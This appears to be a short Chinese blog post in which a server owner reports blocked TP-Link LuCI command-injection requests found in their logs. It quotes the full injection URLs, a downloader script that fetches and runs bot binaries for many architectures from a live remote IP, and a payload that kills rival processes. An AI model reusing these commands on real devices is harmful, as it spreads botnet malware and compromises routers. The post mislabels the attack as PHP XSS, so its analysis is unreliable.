看见标题是不是以为注入成功了,诶!
被拦截了!要不然服务器可能真的没
首先今天看日志,诶,发现这样子的奇怪请求:
</s><i> </i> /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+wget.sh;+wget+http://87.121.112.42/wget.sh;+chmod+777+wget.sh;+./wget.sh+tplink;+rm+-rf+wget.sh`)<i> </i><e>看起来是在尝试用php的xss注入,把 http://87.121.112.42/wget.sh 下载到本地并执行,我看了看这个sh
```
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="87.121.112.42"
binout="runmeplz"
exec="eshay"
for arch in $binarys
do
rm -rf $arch
rm -rf $binout
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ “$status” = “$exec” ]; then
break
fi
done
```
看了看,似乎是远控的,然后又发现一段
</s><i> </i>/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`for+proc_dir+in+/proc/[0-9]*;+do+pid=${proc_dir##*/};+buffer=$(cat+"/proc/$pid/maps");+if+[+"${#buffer}"+-gt+1+];+then+if+[+"${buffer#*"/lib/"}"+=+"$buffer"+]+&&+[+"${buffer#*"telnetdbot"}"+=+"$buffer"+];+then+kill+-9+"$pid";+fi;+fi;+done`)<i> </i><e>
>!不是哥们,我服务器Windows,成功注入了也没事!<